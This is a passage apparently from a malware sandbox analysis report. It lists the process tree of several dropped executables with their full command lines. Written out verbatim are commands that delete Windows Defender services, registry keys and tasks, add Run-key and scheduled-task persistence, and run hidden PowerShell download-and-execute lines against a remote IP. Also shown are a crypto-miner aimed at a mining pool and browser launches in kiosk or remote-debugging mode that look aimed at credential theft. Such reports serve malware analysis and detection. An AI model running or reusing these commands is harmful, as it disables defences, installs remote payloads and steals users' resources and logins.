        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:936
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:3400
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:1500
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:2944
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:1132
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:1848
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:4080
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:3652
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:3792
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:1452
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:1204
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:1220
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:4620
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:1392
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:2924
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:372
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:2752
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:4528
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:988
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:1652
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:3332
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:908
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:3348
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:1812
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:1528
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:4852
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:2772
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:3988
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:2852
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:2976
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:3480
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:4048
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:1488
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:2364
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:4196
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:4880
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:2656
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:4512
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:4672
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:2876
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:452
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:3124
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:1976
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:4732
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:5084
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:2956
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:3120
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:4348
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:1740
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:3096
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:3832
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:4244
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:3452
      - C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe"
        6⤵
        Executes dropped EXE
        
        PID:1884
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s
        7⤵
        Modifies registry key
        
        PID:1392
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Microsoft Windows Service 8229" /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe\" /f
        7⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2732
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Microsoft Windows Service 8229" /t REG_BINARY /d 020000000000000000000000 /f
        7⤵
        Modifies registry key
        
        PID:4728
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunNotification /v "StartupTNotiMicrosoft Windows Service 8229" /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:2828
      - C:\Users\Admin\AppData\Local\Temp\10318740101\84c9895e7a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10318740101\84c9895e7a.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2724
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn 5i19imaw9TS /tr "mshta C:\Users\Admin\AppData\Local\Temp\TMhqOAnRR.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1184
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn 5i19imaw9TS /tr "mshta C:\Users\Admin\AppData\Local\Temp\TMhqOAnRR.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3796
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\TMhqOAnRR.hta
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1220
        
        C:\Users\Admin\AppData\Local\TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE
        
        "C:\Users\Admin\AppData\Local\TempQSYMROVXIDJNXYYOAL33DJHYUDXWM7HQ.EXE"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3788
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10318750121\am_no.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5064
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3184
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4828
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2204
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "86ns3maHsoJ" /tr "mshta \"C:\Temp\BKPOv9yMq.hta\"" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3412
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\BKPOv9yMq.hta"
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:2112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3460
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3832
      - C:\Users\Admin\AppData\Local\Temp\10318860101\QL4t9UZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10318860101\QL4t9UZ.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Modifies system certificate store
        
        PID:2444
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1900
        
        C:\Users\Admin\AppData\Roaming\winhost\winhost.exe
        
        C:\Users\Admin\AppData\Roaming\winhost\winhost.exe --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=20
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3304
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1376
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3168
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM winhost.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4848
        
        C:\Users\Admin\AppData\Roaming\winhost\winhost.exe
        
        C:\Users\Admin\AppData\Roaming\winhost\winhost.exe --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=80
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:5076
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1392
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:6984
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:6624
      - C:\Users\Admin\AppData\Local\Temp\10319000101\5d0ced5341.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319000101\5d0ced5341.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2544
      - C:\Users\Admin\AppData\Local\Temp\10319010101\e30a4e2837.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319010101\e30a4e2837.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4708
      - C:\Users\Admin\AppData\Local\Temp\10319020101\de9077fc34.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319020101\de9077fc34.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3288
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3680
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:372
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3692
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1372
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2552
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:1756
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1624
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1916 -prefsLen 27099 -prefMapHandle 1920 -prefMapSize 270279 -ipcHandle 1868 -initialChannelId {0c25a936-3923-4e42-9f38-c959b38d2146} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:1580
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2436 -prefsLen 27135 -prefMapHandle 2440 -prefMapSize 270279 -ipcHandle 2448 -initialChannelId {7ae24d4f-14eb-49ba-ad9a-37e7afc3fe14} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:868
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3852 -prefsLen 25213 -prefMapHandle 3856 -prefMapSize 270279 -jsInitHandle 3860 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3868 -initialChannelId {24ee296c-a020-431c-9a78-4f653f4322dc} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        
        PID:2976
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4060 -prefsLen 27325 -prefMapHandle 4064 -prefMapSize 270279 -ipcHandle 4072 -initialChannelId {9469753f-90a4-4401-ba37-a108afe941d2} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:3732
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2896 -prefsLen 34824 -prefMapHandle 2900 -prefMapSize 270279 -jsInitHandle 2980 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2932 -initialChannelId {51690dc4-2b45-4fbb-8562-91e159e0c720} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        
        PID:2760
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 2584 -prefsLen 35012 -prefMapHandle 3424 -prefMapSize 270279 -ipcHandle 2472 -initialChannelId {019719e5-f733-471c-9cc7-fb2540cc2971} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        9⤵
        
        PID:5224
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5092 -prefsLen 32900 -prefMapHandle 5096 -prefMapSize 270279 -jsInitHandle 5100 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5112 -initialChannelId {790f2635-b3d7-49fa-82de-079ca9d3a3cf} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        9⤵
        
        PID:5232
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5308 -prefsLen 32952 -prefMapHandle 5312 -prefMapSize 270279 -jsInitHandle 5316 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5320 -initialChannelId {4408bbe9-afa6-4996-8f40-a943ae983e17} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        9⤵
        
        PID:5184
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5492 -prefsLen 32952 -prefMapHandle 5496 -prefMapSize 270279 -jsInitHandle 5500 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5508 -initialChannelId {5abaf18c-1cbc-4c6e-8c6b-8c79fc56086b} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        9⤵
        
        PID:3300
        
        C:\Program Files\Mozilla Firefox\crashreporter.exe
        
        "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\minidumps\b1b64354-3b48-49d1-948d-a43902cc5099.dmp"
        9⤵
        
        PID:6680
      - C:\Users\Admin\AppData\Local\Temp\10319030101\ef54ab4fd5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319030101\ef54ab4fd5.exe"
        6⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4732
      - C:\Users\Admin\AppData\Local\Temp\10319040101\e96b36abf6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10319040101\e96b36abf6.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Executes dropped EXE
        Identifies Wine through registry keys
        System Location Discovery: System Language Discovery
        
        PID:1384
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:5504
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ff924cddcf8,0x7ff924cddd04,0x7ff924cddd10
        8⤵
        
        PID:5552
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,7654009875074898201,13233846586069826850,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1960 /prefetch:2
        8⤵
        
        PID:1404
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,7654009875074898201,13233846586069826850,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2224 /prefetch:3
        8⤵
        
        PID:372
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2348,i,7654009875074898201,13233846586069826850,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2360 /prefetch:8
        8⤵
        
        PID:5152
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,7654009875074898201,13233846586069826850,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3212 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5364
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3344,i,7654009875074898201,13233846586069826850,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3244 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5508
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
